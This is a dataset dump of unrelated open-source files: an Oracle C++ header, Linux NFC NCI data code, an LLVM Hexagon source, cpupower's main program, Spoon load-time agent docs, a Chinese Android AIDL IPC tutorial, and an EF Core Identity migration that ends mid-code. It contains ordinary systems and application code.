// // forked from OCIPL Version 1.3 // by Ivan Brezina <[email protected]> /* All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ //TODO - SQLT_VST when should I use this datatype? #ifndef TROTL_MISC_H_ #define TROTL_MISC_H_ #include "trotl_common.h" #include "trotl_export.h" #include "trotl_handle.h" #include "trotl_var.h" #include "trotl_describe.h" #include "trotl_parser.h" namespace trotl { /* Misc datatype - temporary solution This class represents any datatype, whose value can be converted into a string */ struct TROTL_EXPORT BindParMisc: public BindPar { BindParMisc(unsigned int pos, SqlStatement &stmt, DescribeColumn* ct); BindParMisc(unsigned int pos, SqlStatement &stmt, BindVarDecl &decl); virtual ~BindParMisc() {} virtual tstring get_string(unsigned int row) const { return is_null(row) ? "NULL" : tstring(((char*)valuep)+(row * value_sz)); } protected: BindParMisc(const BindParMisc &other); }; }; #endif
{ "pile_set_name": "Github" }
/* * The NFC Controller Interface is the communication protocol between an * NFC Controller (NFCC) and a Device Host (DH). * * Copyright (C) 2011 Texas Instruments, Inc. * * Written by Ilan Elias <[email protected]> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 * as published by the Free Software Foundation * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA * */ #define pr_fmt(fmt) KBUILD_MODNAME ": %s: " fmt, __func__ #include <linux/types.h> #include <linux/interrupt.h> #include <linux/wait.h> #include <linux/bitops.h> #include <linux/skbuff.h> #include "../nfc.h" #include <net/nfc/nci.h> #include <net/nfc/nci_core.h> #include <linux/nfc.h> /* Complete data exchange transaction and forward skb to nfc core */ void nci_data_exchange_complete(struct nci_dev *ndev, struct sk_buff *skb, int err) { data_exchange_cb_t cb = ndev->data_exchange_cb; void *cb_context = ndev->data_exchange_cb_context; pr_debug("len %d, err %d\n", skb ? skb->len : 0, err); /* data exchange is complete, stop the data timer */ del_timer_sync(&ndev->data_timer); clear_bit(NCI_DATA_EXCHANGE_TO, &ndev->flags); if (cb) { ndev->data_exchange_cb = NULL; ndev->data_exchange_cb_context = 0; /* forward skb to nfc core */ cb(cb_context, skb, err); } else if (skb) { pr_err("no rx callback, dropping rx data...\n"); /* no waiting callback, free skb */ kfree_skb(skb); } clear_bit(NCI_DATA_EXCHANGE, &ndev->flags); } /* ----------------- NCI TX Data ----------------- */ static inline void nci_push_data_hdr(struct nci_dev *ndev, __u8 conn_id, struct sk_buff *skb, __u8 pbf) { struct nci_data_hdr *hdr; int plen = skb->len; hdr = (struct nci_data_hdr *) skb_push(skb, NCI_DATA_HDR_SIZE); hdr->conn_id = conn_id; hdr->rfu = 0; hdr->plen = plen; nci_mt_set((__u8 *)hdr, NCI_MT_DATA_PKT); nci_pbf_set((__u8 *)hdr, pbf); skb->dev = (void *) ndev; } static int nci_queue_tx_data_frags(struct nci_dev *ndev, __u8 conn_id, struct sk_buff *skb) { int total_len = skb->len; unsigned char *data = skb->data; unsigned long flags; struct sk_buff_head frags_q; struct sk_buff *skb_frag; int frag_len; int rc = 0; pr_debug("conn_id 0x%x, total_len %d\n", conn_id, total_len); __skb_queue_head_init(&frags_q); while (total_len) { frag_len = min_t(int, total_len, ndev->max_data_pkt_payload_size); skb_frag = nci_skb_alloc(ndev, (NCI_DATA_HDR_SIZE + frag_len), GFP_KERNEL); if (skb_frag == NULL) { rc = -ENOMEM; goto free_exit; } skb_reserve(skb_frag, NCI_DATA_HDR_SIZE); /* first, copy the data */ memcpy(skb_put(skb_frag, frag_len), data, frag_len); /* second, set the header */ nci_push_data_hdr(ndev, conn_id, skb_frag, ((total_len == frag_len) ? (NCI_PBF_LAST) : (NCI_PBF_CONT))); __skb_queue_tail(&frags_q, skb_frag); data += frag_len; total_len -= frag_len; pr_debug("frag_len %d, remaining total_len %d\n", frag_len, total_len); } /* queue all fragments atomically */ spin_lock_irqsave(&ndev->tx_q.lock, flags); while ((skb_frag = __skb_dequeue(&frags_q)) != NULL) __skb_queue_tail(&ndev->tx_q, skb_frag); spin_unlock_irqrestore(&ndev->tx_q.lock, flags); /* free the original skb */ kfree_skb(skb); goto exit; free_exit: while ((skb_frag = __skb_dequeue(&frags_q)) != NULL) kfree_skb(skb_frag); exit: return rc; } /* Send NCI data */ int nci_send_data(struct nci_dev *ndev, __u8 conn_id, struct sk_buff *skb) { int rc = 0; pr_debug("conn_id 0x%x, plen %d\n", conn_id, skb->len); /* check if the packet need to be fragmented */ if (skb->len <= ndev->max_data_pkt_payload_size) { /* no need to fragment packet */ nci_push_data_hdr(ndev, conn_id, skb, NCI_PBF_LAST); skb_queue_tail(&ndev->tx_q, skb); } else { /* fragment packet and queue the fragments */ rc = nci_queue_tx_data_frags(ndev, conn_id, skb); if (rc) { pr_err("failed to fragment tx data packet\n"); goto free_exit; } } queue_work(ndev->tx_wq, &ndev->tx_work); goto exit; free_exit: kfree_skb(skb); exit: return rc; } /* ----------------- NCI RX Data ----------------- */ static void nci_add_rx_data_frag(struct nci_dev *ndev, struct sk_buff *skb, __u8 pbf) { int reassembly_len; int err = 0; if (ndev->rx_data_reassembly) { reassembly_len = ndev->rx_data_reassembly->len; /* first, make enough room for the already accumulated data */ if (skb_cow_head(skb, reassembly_len)) { pr_err("error adding room for accumulated rx data\n"); kfree_skb(skb); skb = 0; kfree_skb(ndev->rx_data_reassembly); ndev->rx_data_reassembly = 0; err = -ENOMEM; goto exit; } /* second, combine the two fragments */ memcpy(skb_push(skb, reassembly_len), ndev->rx_data_reassembly->data, reassembly_len); /* third, free old reassembly */ kfree_skb(ndev->rx_data_reassembly); ndev->rx_data_reassembly = 0; } if (pbf == NCI_PBF_CONT) { /* need to wait for next fragment, store skb and exit */ ndev->rx_data_reassembly = skb; return; } exit: nci_data_exchange_complete(ndev, skb, err); } /* Rx Data packet */ void nci_rx_data_packet(struct nci_dev *ndev, struct sk_buff *skb) { __u8 pbf = nci_pbf(skb->data); pr_debug("len %d\n", skb->len); pr_debug("NCI RX: MT=data, PBF=%d, conn_id=%d, plen=%d\n", nci_pbf(skb->data), nci_conn_id(skb->data), nci_plen(skb->data)); /* strip the nci data header */ skb_pull(skb, NCI_DATA_HDR_SIZE); if (ndev->target_active_prot == NFC_PROTO_MIFARE) { /* frame I/F => remove the status byte */ pr_debug("NFC_PROTO_MIFARE => remove the status byte\n"); skb_trim(skb, (skb->len - 1)); } nci_add_rx_data_frag(ndev, skb, pbf); }
{ "pile_set_name": "Github" }
//===-- HexagonMCExpr.cpp - Hexagon specific MC expression classes //----------===// // // The LLVM Compiler Infrastructure // // This file is distributed under the University of Illinois Open Source // License. See LICENSE.TXT for details. // //===----------------------------------------------------------------------===// #include "HexagonMCExpr.h" #include "llvm/MC/MCContext.h" #include "llvm/MC/MCValue.h" #include "llvm/Support/raw_ostream.h" using namespace llvm_ks; #define DEBUG_TYPE "hexagon-mcexpr" HexagonNoExtendOperand *HexagonNoExtendOperand::Create(MCExpr const *Expr, MCContext &Ctx) { return new (Ctx) HexagonNoExtendOperand(Expr); } bool HexagonNoExtendOperand::evaluateAsRelocatableImpl( MCValue &Res, MCAsmLayout const *Layout, MCFixup const *Fixup) const { return Expr->evaluateAsRelocatable(Res, Layout, Fixup); } void HexagonNoExtendOperand::visitUsedExpr(MCStreamer &Streamer) const {} MCFragment *llvm_ks::HexagonNoExtendOperand::findAssociatedFragment() const { return Expr->findAssociatedFragment(); } void HexagonNoExtendOperand::fixELFSymbolsInTLSFixups(MCAssembler &Asm) const {} MCExpr const *HexagonNoExtendOperand::getExpr() const { return Expr; } bool HexagonNoExtendOperand::classof(MCExpr const *E) { return E->getKind() == MCExpr::Target; } HexagonNoExtendOperand::HexagonNoExtendOperand(MCExpr const *Expr) : Expr(Expr) {} void HexagonNoExtendOperand::printImpl(raw_ostream &OS, const MCAsmInfo *MAI) const { Expr->print(OS, MAI); }
{ "pile_set_name": "Github" }
// SPDX-License-Identifier: GPL-2.0-only /* * (C) 2010,2011 Thomas Renninger <[email protected]>, Novell Inc. * * Ideas taken over from the perf userspace tool (included in the Linus * kernel git repo): subcommand builtins and param parsing. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <sched.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/utsname.h> #include "builtin.h" #include "helpers/helpers.h" #include "helpers/bitmask.h" #define ARRAY_SIZE(x) (sizeof(x)/sizeof(x[0])) static int cmd_help(int argc, const char **argv); /* Global cpu_info object available for all binaries * Info only retrieved from CPU 0 * * Values will be zero/unknown on non X86 archs */ struct cpupower_cpu_info cpupower_cpu_info; int run_as_root; int base_cpu; /* Affected cpus chosen by -c/--cpu param */ struct bitmask *cpus_chosen; #ifdef DEBUG int be_verbose; #endif static void print_help(void); struct cmd_struct { const char *cmd; int (*main)(int, const char **); int needs_root; }; static struct cmd_struct commands[] = { { "frequency-info", cmd_freq_info, 0 }, { "frequency-set", cmd_freq_set, 1 }, { "idle-info", cmd_idle_info, 0 }, { "idle-set", cmd_idle_set, 1 }, { "set", cmd_set, 1 }, { "info", cmd_info, 0 }, { "monitor", cmd_monitor, 0 }, { "help", cmd_help, 0 }, /* { "bench", cmd_bench, 1 }, */ }; static void print_help(void) { unsigned int i; #ifdef DEBUG printf(_("Usage:\tcpupower [-d|--debug] [-c|--cpu cpulist ] <command> [<args>]\n")); #else printf(_("Usage:\tcpupower [-c|--cpu cpulist ] <command> [<args>]\n")); #endif printf(_("Supported commands are:\n")); for (i = 0; i < ARRAY_SIZE(commands); i++) printf("\t%s\n", commands[i].cmd); printf(_("\nNot all commands can make use of the -c cpulist option.\n")); printf(_("\nUse 'cpupower help <command>' for getting help for above commands.\n")); } static int print_man_page(const char *subpage) { int len; char *page; len = 10; /* enough for "cpupower-" */ if (subpage != NULL) len += strlen(subpage); page = malloc(len); if (!page) return -ENOMEM; sprintf(page, "cpupower"); if ((subpage != NULL) && strcmp(subpage, "help")) { strcat(page, "-"); strcat(page, subpage); } execlp("man", "man", page, NULL); /* should not be reached */ return -EINVAL; } static int cmd_help(int argc, const char **argv) { if (argc > 1) { print_man_page(argv[1]); /* exits within execlp() */ return EXIT_FAILURE; } print_help(); return EXIT_SUCCESS; } static void print_version(void) { printf(PACKAGE " " VERSION "\n"); printf(_("Report errors and bugs to %s, please.\n"), PACKAGE_BUGREPORT); } static void handle_options(int *argc, const char ***argv) { int ret, x, new_argc = 0; if (*argc < 1) return; for (x = 0; x < *argc && ((*argv)[x])[0] == '-'; x++) { const char *param = (*argv)[x]; if (!strcmp(param, "-h") || !strcmp(param, "--help")) { print_help(); exit(EXIT_SUCCESS); } else if (!strcmp(param, "-c") || !strcmp(param, "--cpu")) { if (*argc < 2) { print_help(); exit(EXIT_FAILURE); } if (!strcmp((*argv)[x+1], "all")) bitmask_setall(cpus_chosen); else { ret = bitmask_parselist( (*argv)[x+1], cpus_chosen); if (ret < 0) { fprintf(stderr, _("Error parsing cpu " "list\n")); exit(EXIT_FAILURE); } } x += 1; /* Cut out param: cpupower -c 1 info -> cpupower info */ new_argc += 2; continue; } else if (!strcmp(param, "-v") || !strcmp(param, "--version")) { print_version(); exit(EXIT_SUCCESS); #ifdef DEBUG } else if (!strcmp(param, "-d") || !strcmp(param, "--debug")) { be_verbose = 1; new_argc++; continue; #endif } else { fprintf(stderr, "Unknown option: %s\n", param); print_help(); exit(EXIT_FAILURE); } } *argc -= new_argc; *argv += new_argc; } int main(int argc, const char *argv[]) { const char *cmd; unsigned int i, ret; struct stat statbuf; struct utsname uts; char pathname[32]; cpus_chosen = bitmask_alloc(sysconf(_SC_NPROCESSORS_CONF)); argc--; argv += 1; handle_options(&argc, &argv); cmd = argv[0]; if (argc < 1) { print_help(); return EXIT_FAILURE; } setlocale(LC_ALL, ""); textdomain(PACKAGE); /* Turn "perf cmd --help" into "perf help cmd" */ if (argc > 1 && !strcmp(argv[1], "--help")) { argv[1] = argv[0]; argv[0] = cmd = "help"; } base_cpu = sched_getcpu(); if (base_cpu < 0) { fprintf(stderr, _("No valid cpus found.\n")); return EXIT_FAILURE; } get_cpu_info(&cpupower_cpu_info); run_as_root = !geteuid(); if (run_as_root) { ret = uname(&uts); sprintf(pathname, "/dev/cpu/%d/msr", base_cpu); if (!ret && !strcmp(uts.machine, "x86_64") && stat(pathname, &statbuf) != 0) { if (system("modprobe msr") == -1) fprintf(stderr, _("MSR access not available.\n")); } } for (i = 0; i < ARRAY_SIZE(commands); i++) { struct cmd_struct *p = commands + i; if (strcmp(p->cmd, cmd)) continue; if (!run_as_root && p->needs_root) { fprintf(stderr, _("Subcommand %s needs root " "privileges\n"), cmd); return EXIT_FAILURE; } ret = p->main(argc, argv); if (cpus_chosen) bitmask_free(cpus_chosen); return ret; } print_help(); return EXIT_FAILURE; }
{ "pile_set_name": "Github" }
--- title: Agent tags: [usage] keywords: agent, usage, java, loadtime --- # Spoon Agent Spoon can also be used to transform classes at load time in the JVM. FOr this, `SpoonClassFileTransformer` provide an abstraction of `ClassFileTransformer` where the user can define Spoon transformation. Bytecode of classes will be decompiled on-the-fly when loaded, and the Spoon AST will be updated in consequence, and the code is recompiled on-the-fly. The following example shows the definition of a basic JVM agent for inserting a tracing method call a the end of every method called `foo`. Here is the agent: ```java public class Agent { public static void premain(String agentArgs, Instrumentation inst) { System.out.println( "Hello Agent" ); //Create a SpoonClassFileTransformer, that // * excludes any classes not in our package from decompilation // * adds the statement System.out.println("Hello <className>"); to the (first) method named "foo" of every classes SpoonClassFileTransformer transformer = new SpoonClassFileTransformer( cl -> cl.startsWith("org/my/package"), new InsertPrintTransformer() ); inst.addTransformer(transformer); System.out.println( "Agent Done." ); } } ``` ```java public class InsertPrintTransformer implements TypeTransformer { @Override public boolean accept(CtType type) { if ((type instanceof CtClass) && type.getMethodsByName("foo").size() > 0) { return true; } else { return false; } } @Override public void transform(CtType type) { System.err.println("Transforming " + type.getQualifiedName()); CtMethod main = (CtMethod) type.getMethodsByName("foo").get(0); main.getBody().addStatement(type.getFactory().createCodeSnippetStatement("System.out.println(\"Hello " + type.getQualifiedName() + "\");")); System.err.println("Done transforming " + type.getQualifiedName()); } } ``` :warning: The `SpoonClassFileTransformer` feature (and all features relying on decompilation) are not included in `spoon-core` but in `spoon-decompiler`. If you want to use them you should declare a dependency to `spoon-decompiler`.
{ "pile_set_name": "Github" }
# AIDL(上) Demo ## 0x01 Demo 创建一个Android项目,包含三个Module,app_client,app_server和ipc: - app_client:`com.android.application`,Client - app_server:`com.android.application`,Server - ipc:`com.android.library`,放AIDL及model文件 ### ipc中创建AIDL文件 ```aidl // IStudentManager.aidl package com.ttdevs.ipc; import com.ttdevs.ipc.Student; /** * Student Manager */ interface IStudentManager { // String getStudent(String student); // 不指定tag默认为in // void addStudentWithNull(Student student); // 自定义类型必须指定tag // void addStudentWithIn(String student); // 不能定义同名方法? // oneway void addStudentWithOut(out Student student); // oneway 不能合用 out // oneway void addStudentWithInout(inout Student student); // oneway 不能合用 inout String getStudent(String student); oneway void addStudentOneway(in String student); void addStudentWithIn(in Student student); void addStudentWithOut(out Student student); void addStudentWithInout(inout Student student); Student addStudentWithInoutAndReturn(inout Student student); } // Student.aidl package com.ttdevs.ipc; // 不同包时需导入 // import com.ttdevs.ipc; parcelable Student; ``` ### app_server中创建Service ```java public class StudentService extends Service { public StudentService() { } @Override public int onStartCommand(Intent intent, int flags, int startId) { return START_STICKY; } @Override public IBinder onBind(Intent intent) { return sBinder; } private static IStudentManager.Stub sBinder = new IStudentManager.Stub() { @Override public String getStudent(String student) throws RemoteException { LogUtils.d("getStudent: " + student); return "Tom,30"; } @Override public void addStudentOneway(String student) throws RemoteException { LogUtils.d("addStudentOneway: start " + student); try { Thread.sleep(1000); } catch (InterruptedException e) { e.printStackTrace(); } LogUtils.d("addStudentOneway: end " + student); } @Override public void addStudentWithIn(Student student) throws RemoteException { LogUtils.d("addStudentWithIn: " + student.toString()); student.setName("Tom"); student.setAge(30); } @Override public void addStudentWithOut(Student student) throws RemoteException { LogUtils.d("addStudentWithOut: " + student.toString()); student.setName("Tom"); student.setAge(30); } @Override public void addStudentWithInout(Student student) throws RemoteException { LogUtils.d("addStudentWithInout: " + student.toString()); student.setName("Tom"); student.setAge(30); } @Override public Student addStudentWithInoutAndReturn(Student student) throws RemoteException { LogUtils.d("addStudentWithInoutAndReturn: " + student.toString()); student.setName("Tom"); student.setAge(30); return student; } }; } ``` ### app_client中创建测试Activity ```java public class MainActivity extends AppCompatActivity implements View.OnClickListener { private IStudentManager mStudentManager; private Button btConnect; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); LogUtils.init(">>>>>Client "); btConnect = findViewById(R.id.bt_connect); bindService(); } @Override public void onClick(View v) { try { String student = "Jim,18"; switch (v.getId()) { case R.id.bt_connect: bindService(); return; case R.id.bt_get: String result = mStudentManager.getStudent(student); LogUtils.d("getStudent: " + result); return; case R.id.bt_oneway: mStudentManager.addStudentOneway(student); LogUtils.d("addStudentOneway: return"); return; default: break; } } catch (RemoteException e) { e.printStackTrace(); } try { Student student = new Student(); student.setName("Jim"); student.setAge(18); switch (v.getId()) { case R.id.bt_in: mStudentManager.addStudentWithIn(student); break; case R.id.bt_out: LogUtils.d("addStudentWithOut: " + student.toString()); mStudentManager.addStudentWithOut(student); break; case R.id.bt_inout: LogUtils.d("addStudentWithInout: " + student.toString()); mStudentManager.addStudentWithInout(student); break; case R.id.bt_inout_return: LogUtils.d("addStudentWithInoutAndReturn: " + student.toString()); Student temp = mStudentManager.addStudentWithInoutAndReturn(student); LogUtils.d("addStudentWithInoutAndReturn: " + temp.toString()); break; default: break; } LogUtils.d(student.toString()); } catch (RemoteException e) { e.printStackTrace(); } } private void bindService() { try { bindService(Constant.getServerIntent(), new ServiceConnection() { @Override public void onServiceConnected(ComponentName name, IBinder service) { mStudentManager = IStudentManager.Stub.asInterface(service); LogUtils.d("Connect success."); runOnUiThread(() -> btConnect.setEnabled(false)); } @Override public void onServiceDisconnected(ComponentName name) { mStudentManager = null; runOnUiThread(() -> btConnect.setEnabled(true)); } }, Context.BIND_AUTO_CREATE); } catch (Exception e) { e.printStackTrace(); } } } ``` 分别运行Server和Client,点击Client上的Connect(默认会自动连接),即可在Client和Server两个进程之间传递数据。Client按钮全部点击一遍,Log如下: ```log 2020-09-11 14:46:29.029 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: Connect success. // 默认情况,Server收到Client数据,并向Client返回自己的数据 2020-09-11 14:46:32.354 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: getStudent: Jim,18 2020-09-11 14:46:32.355 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: getStudent: Tom,30 // oneway,Client调用之后立马返回,不会等Server执行完之后才返回 2020-09-11 14:46:37.396 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: addStudentOneway: return 2020-09-11 14:46:37.396 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: addStudentOneway: start Jim,18 2020-09-11 14:46:38.397 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: addStudentOneway: end Jim,18 // in,Client传递数据到,Server的改动不会影响到Client 2020-09-11 14:46:40.606 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: addStudentWithIn: Student{name='Jim', age=18} 2020-09-11 14:46:40.607 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: Student{name='Jim', age=18} // out,Client数据没有传递到Server,Server的数据传递到了Client 2020-09-11 14:46:43.689 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: addStudentWithOut: Student{name='Jim', age=18} 2020-09-11 14:46:43.689 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: addStudentWithOut: Student{name='null', age=0} 2020-09-11 14:46:43.690 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: Student{name='Tom', age=30} // inout,Client和Server的数据可以互相传递 2020-09-11 14:46:46.347 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: addStudentWithInout: Student{name='Jim', age=18} 2020-09-11 14:46:46.347 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: addStudentWithInout: Student{name='Jim', age=18} 2020-09-11 14:46:46.348 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: Student{name='Tom', age=30} // inout和return的功能都体现出来 2020-09-11 14:46:48.419 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: addStudentWithInoutAndReturn: Student{name='Jim', age=18} 2020-09-11 14:46:48.420 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: addStudentWithInoutAndReturn: Student{name='Jim', age=18} 2020-09-11 14:46:48.421 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: addStudentWithInoutAndReturn: Student{name='Tom', age=30} 2020-09-11 14:46:48.421 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: Student{name='Tom', age=30} // Client注册到Server 2020-09-11 14:46:50.727 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: Register listener // Server向Client发送数据 2020-09-11 14:46:50.728 5933-5970/com.ttdevs.ipc.client D/>>>>>Client: From server: Student{name='Tom', age=31} 2020-09-11 14:46:51.890 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: Unregister listener ``` ## Callback Demo 上述Demo主要演示Client主动向Server发起请求的情况,当Server需要主动向Client发送消息时如何处理? ### 更新ipc中AIDL文件 ```aidl // IStudentManager.aidl package com.ttdevs.ipc; import com.ttdevs.ipc.Student; import com.ttdevs.ipc.IStudentListener; /** * Student Manager */ interface IStudentManager { // ... oneway void register(IStudentListener listener); oneway void unregister(IStudentListener listener); } // IStudentListener.aidl package com.ttdevs.ipc; import com.ttdevs.ipc.Student; interface IStudentListener { oneway void updateStudent(in Student student); } ``` ### 更新app_server ```java public class StudentService extends Service { // ... private static IStudentManager.Stub sBinder = new IStudentManager.Stub() { // ... private final RemoteCallbackList<IStudentListener> mCallbackList = new RemoteCallbackList<>(); @Override public void register(IStudentListener listener) throws RemoteException { if (null != listener) { mCallbackList.register(listener); LogUtils.d("Register listener"); } sendCallbackMessage(); } @Override public void unregister(IStudentListener listener) throws RemoteException { if (null != listener) { mCallbackList.unregister(listener); LogUtils.d("Unregister listener"); } sendCallbackMessage(); } private final Handler mHandler = new Handler(Looper.getMainLooper()); private void sendCallbackMessage() { mHandler.removeCallbacksAndMessages(null); final Student student = new Student(); student.setName("Tom"); student.setAge(30); mHandler.post(new Runnable() { @Override public void run() { try { if (mCallbackList.getRegisteredCallbackCount() <= 0) { return; } student.setAge(student.getAge() + 1); int num = mCallbackList.beginBroadcast(); for (int i = 0; i < num; i++) { try { mCallbackList.getBroadcastItem(i).updateStudent(student); } catch (RemoteException e) { e.printStackTrace(); } } mCallbackList.finishBroadcast(); } catch (Exception e) { e.printStackTrace(); } mHandler.postDelayed(this, 8000); } }); } }; } ``` ### 更新app_client ```java public class MainActivity extends AppCompatActivity implements View.OnClickListener { // ... @Override public void onClick(View v) { try { String student = "Jim,18"; switch (v.getId()) { // ... case R.id.bt_register: registerListener(true); return; case R.id.bt_unregister: registerListener(false); return; default: break; } } catch (RemoteException e) { e.printStackTrace(); } // ... } private static final IStudentListener mListener = new IStudentListener.Stub() { @Override public void updateStudent(Student student) throws RemoteException { LogUtils.d("From server: " + student.toString()); } }; /** * 注册/取消注册 * * @param register */ private void registerListener(boolean register) { try { if (register) { mStudentManager.register(mListener); } else { mStudentManager.unregister(mListener); } } catch (RemoteException e) { e.printStackTrace(); } } // ... } ``` 以上为常见的AIDL操作。 ## 0xFF Reference 1. https://developer.android.com/guide/components/aidl 2. https://source.android.com/devices/architecture/aidl/overview
{ "pile_set_name": "Github" }
using System; using Microsoft.EntityFrameworkCore.Migrations; namespace Spark.Web.Migrations { public partial class Init : Migration { protected override void Up(MigrationBuilder migrationBuilder) { migrationBuilder.CreateTable( name: "AspNetRoles", columns: table => new { Id = table.Column<string>(nullable: false), Name = table.Column<string>(maxLength: 256, nullable: true), NormalizedName = table.Column<string>(maxLength: 256, nullable: true), ConcurrencyStamp = table.Column<string>(nullable: true) }, constraints: table => { table.PrimaryKey("PK_AspNetRoles", x => x.Id); }); migrationBuilder.CreateTable( name: "AspNetUsers", columns: table => new { Id = table.Column<string>(nullable: false), UserName = table.Column<string>(maxLength: 256, nullable: true), NormalizedUserName = table.Column<string>(maxLength: 256, nullable: true), Email = table.Column<string>(maxLength: 256, nullable: true), NormalizedEmail = table.Column<string>(maxLength: 256, nullable: true), EmailConfirmed = table.Column<bool>(nullable: false), PasswordHash = table.Column<string>(nullable: true), SecurityStamp = table.Column<string>(nullable: true), ConcurrencyStamp = table.Column<string>(nullable: true), PhoneNumber = table.Column<string>(nullable: true), PhoneNumberConfirmed = table.Column<bool>(nullable: false), TwoFactorEnabled = table.Column<bool>(nullable: false), LockoutEnd = table.Column<DateTimeOffset>(nullable: true), LockoutEnabled = table.Column<bool>(nullable: false), AccessFailedCount = table.Column<int>(nullable: false) }, constraints: table => { table.PrimaryKey("PK_AspNetUsers", x => x.Id); }); migrationBuilder.CreateTable( name: "AspNetRoleClaims", columns: table => new { Id = table.Column<int>(nullable: false) .Annotation("Sqlite:Autoincrement", true), RoleId = table.Column<string>(nullable: false), ClaimType = table.Column<string>(nullable: true), ClaimValue = table.Column<string>(nullable: true) }, constraints: table => { table.PrimaryKey("PK_AspNetRoleClaims", x => x.Id); table.ForeignKey( name: "FK_AspNetRoleClaims_AspNetRoles_RoleId", column: x => x.RoleId, principalTable: "AspNetRoles", principalColumn: "Id", onDelete: ReferentialAction.Cascade); }); migrationBuilder.CreateTable( name: "AspNetUserClaims", columns: table => new { Id = table.Column<int>(nullable: false) .Annotation("Sqlite:Autoincrement", true), UserId = table.Column<string>(nullable: false), ClaimType = table.Column<string>(nullable: true), ClaimValue = table.Column<string>(nullable: true) }, constraints: table => { table.PrimaryKey("PK_AspNetUserClaims", x => x.Id); table.ForeignKey( name: "FK_AspNetUserClaims_AspNetUsers_UserId", column: x => x.UserId, principalTable: "AspNetUsers", principalColumn: "Id", onDelete: ReferentialAction.Cascade); }); migrationBuilder.CreateTable( name: "AspNetUserLogins", columns: table => new { LoginProvider = table.Column<string>(maxLength: 128, nullable: false), ProviderKey = table.Column<string>(maxLength: 128, nullable: false), ProviderDisplayName = table.Column<string>(nullable: true), UserId = table.Column<string>(nullable: false) }, constraints: table => { table.PrimaryKey("PK_AspNetUserLogins", x => new { x.LoginProvider, x.ProviderKey }); table.ForeignKey( name: "FK_AspNetUserLogins_AspNetUsers_UserId", column: x => x.UserId, principalTable: "AspNetUsers", principalColumn: "Id", onDelete: ReferentialAction.Cascade); }); migrationBuilder.CreateTable( name: "AspNetUserRoles", columns: table => new { UserId = table.Column<string>(nullable: false), RoleId = table.Column<string>(nullable: false) }, constraints: table => { table.PrimaryKey("PK_AspNetUserRoles", x => new { x.UserId, x.RoleId }); table.ForeignKey( name: "FK_AspNetUserRoles_AspNetRoles_RoleId", column: x => x.RoleId, principalTable: "AspNetRoles", principalColumn: "Id", onDelete: ReferentialAction.Cascade); table.ForeignKey( name: "FK_AspNetUserRoles_AspNetUsers_UserId", column: x => x.UserId, principalTable: "AspNetUsers", principalColumn: "Id", onDelete: ReferentialAction.Cascade); }); migrationBuilder.CreateTable( name: "AspNetUserTokens", columns: table => new { UserId = table.Column<string>(nullable: false), LoginProvider = table.Column<string>(maxLength: 128, nullable: false), Name = table.Column<string>(maxLength: 128, nullable: false), Value = table.Column<string>(nullable: true) }, constraints: table => { table.PrimaryKey("PK_AspNetUserTokens", x => new { x.UserId, x.LoginProvider, x.Name }); table.ForeignKey( name: "FK_AspNetUserTokens_AspNetUsers_UserId", column: x => x.UserId, principalTable: "AspNetUsers", principalColumn: "Id", onDelete: ReferentialAction.Cascade); }); migrationBuilder.InsertData( table: "AspNetRoles", columns: new[] { "Id", "ConcurrencyStamp", "Name", "NormalizedName" }, values: new object[] { "453e564a-29b5-4f1f-b49b-1bd116778fce", "38c23849-bc6b-451e-bba0-c817703d3168", "Admin", "ADMIN" }); migrationBuilder.CreateIndex( name: "IX_AspNetRoleClaims_RoleId", table: "AspNetRoleClaims", column: "RoleId"); migrationBuilder.CreateIndex( name: "RoleNameIndex", table: "AspNetRoles", column: "NormalizedName", unique: true); migrationBuilder.CreateIndex( name: "IX_AspNetUserClaims_UserId", table: "AspNetUserClaims", column: 